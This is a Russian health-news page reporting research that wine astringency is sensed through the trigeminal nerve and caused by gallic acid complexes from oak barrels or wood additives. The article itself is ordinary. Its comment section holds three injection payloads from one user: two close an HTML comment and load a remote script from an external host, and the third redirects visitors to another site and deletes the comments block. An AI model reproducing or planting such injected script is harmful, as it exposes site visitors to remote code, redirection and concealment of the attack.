Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чем мы чувствуем вино? Ок...  >>  Чем мы чувствуем вино? Оказывается, ни языком, ни носом! Ответ шокирует вас!
 
Обратная связь
 

Чем мы чувствуем вино? Оказывается, ни языком, ни носом! Ответ шокирует вас!

Размер шрифта
18 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, при оценке вин лучшие сомелье пользуются не только своим вкусом и обонянием. Наиболее точно почувствовать терпкость вина и его послевкусие им позволяет тройничный нерв, считают ученые.

Чем мы чувствуем вино? Оказывается, ни языком, ни носом! Ответ шокирует вас!

Вкус, приобретаемый вином благодаря бочке, в которой оно созревало, а также его терпкость ощущаются при помощи тройничного нерва (отвечающего также за болевую и температурную чувствительность). К такому выводу пришла команда ученых во главе с профессором факультета биологии Рурского Университета Хансом Хаттом. Полученные ими результаты были опубликованы в журнале Chemical Senses.

Оказывается, пациенты с поврежденным вкусовым нервом способны чувствовать терпкость вина. Это удалось доказать доктору Николь Шобель, которая провела эксперимент с участием таких пациентов. Все они утратили способность различать пять основных вкусов – сладкий, кислый, горький, соленый и умами. Однако они могли оценить терпкость вина благодаря наличию рецепторов тройничного нерва на языке. Этот результат был подтвержден экспериментом научного центра Флориды: при анестезии вкусового нерва у участников сохранялась способность чувствовать терпкость, однако при аналогичном «отключении» тройничного нерва эта способность исчезала.

Ученые из Бохума (где же еще?) первыми смогли определить, какие именно вещества в вине ответственны за его терпкость. Важнейшим элементом является галловая кислота, чем ее больше, тем выраженнее вкус. «В небольших количествах эта кислота образуется в виноградных косточках, а в дубовых бочках она формирует крупные комплексы», – объясняет профессор Хатт. «В красном вине молекулы галловой кислоты связываются друг с другом, что позволяет добиться наибольшего вкусового эффекта». Ученые также определили, что именно крупные комплексы галловой кислоты более активно действуют на нервные окончания тройничного нерва.

Однако вино может приобретать свою терпкость не только благодаря созреванию в дубовых бочках: такого же результата позволяет добиться добавление щепок или древесной муки. «Наше исследование помогло найти более простую методику создания необходимой терпкости вина», – рассказывает Ханс Хатт. «Такие древесные добавки уже получили разрешение на применение в Европе и США».

Таким образом, исследования функций тройничного нерва и влияния на него галловой кислоты не только помогли ученым лучше понять процесс вкусового восприятия, они смогли найти себе отличное практическое применение. Теперь виноделам стало гораздо проще придавать своим винам необходимую терпкость и яркий вкус. Все об алкоголе и его влияние на человека в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - cfvfhcrfz544

21 марта 2015 в 21:15

Цитировать   |   Пожаловаться

Познавательная статья. Прочитала с большим интересом

2 - zzzzzz

30 июня 2015 в 18:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:17

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мифы об алкоголе   Сколько можно выпить, чтобы не было рака печени   Лучшая еда и напитки при похмелье   Как понять, что вы пьете слишком много? Или уже спиваетесь?  
04 декабря 2012Ресвератрол не обладает полезным действием 11 апреля 2013Каждая 30-я смерть от рака из-за водки
 
12 августа 2011Только четверть россиян не пьет 27 июля 2011В Москве за полгода от запоев погибли более 1000 человек
 

Слайдшоу

1
12 мифов о похмелье
Алкогольные напитки, которые заставят вас потолстеть!
Как студенческая жизнь влияет на здоровье

Тесты

1
Есть ли у вас остеопороз?
Что вы знаете о цистите?
Что вы знаете об СДВГ?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.